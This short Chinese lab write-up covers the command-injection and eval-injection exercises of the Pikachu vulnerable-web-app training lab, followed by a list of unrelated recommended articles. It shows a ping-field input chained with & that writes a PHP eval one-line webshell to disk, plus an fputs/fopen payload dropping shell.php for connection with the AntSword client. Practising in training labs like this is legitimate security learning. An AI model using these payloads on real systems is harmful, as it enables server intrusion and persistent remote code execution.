Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
农村小镇哥1 小时前
C#中的字符串格式化
服务器·开发语言·c#
数据知道2 小时前
网络地址转换(NAT)与安全:映射原理、打洞与内网暴露风险
网络·安全·智能路由器·内网安全
小秋求学记.3 小时前
Linux_Ubuntu的相关问题
linux·运维·ubuntu
kali-Myon3 小时前
深入 MySQL 内核:从临时哈希表分配机制详解 Floor 报错注入核心原理
数据库·sql·mysql·安全·web
熊猫钓鱼>_>3 小时前
ArkTS 方舟编程语言 · 原创快速入门教程
运维·架构·ts·harmonyos·arkts·鸿蒙·js
β添砖java3 小时前
黑马Linux笔记
linux·运维·笔记
在水一缸4 小时前
当 AI 拥有了“核按钮”:深入解析 MCP 服务器与命令执行护栏
运维·服务器·人工智能·命令执行·智能体·ai安全·mcp
froyoisle4 小时前
阿里云免费 SSL 证书申请及配置
服务器·阿里云·ssl·网站
雪的季节4 小时前
【无标题】
linux·服务器·python
Thecozzy4 小时前
游戏后端线上事故复盘
安全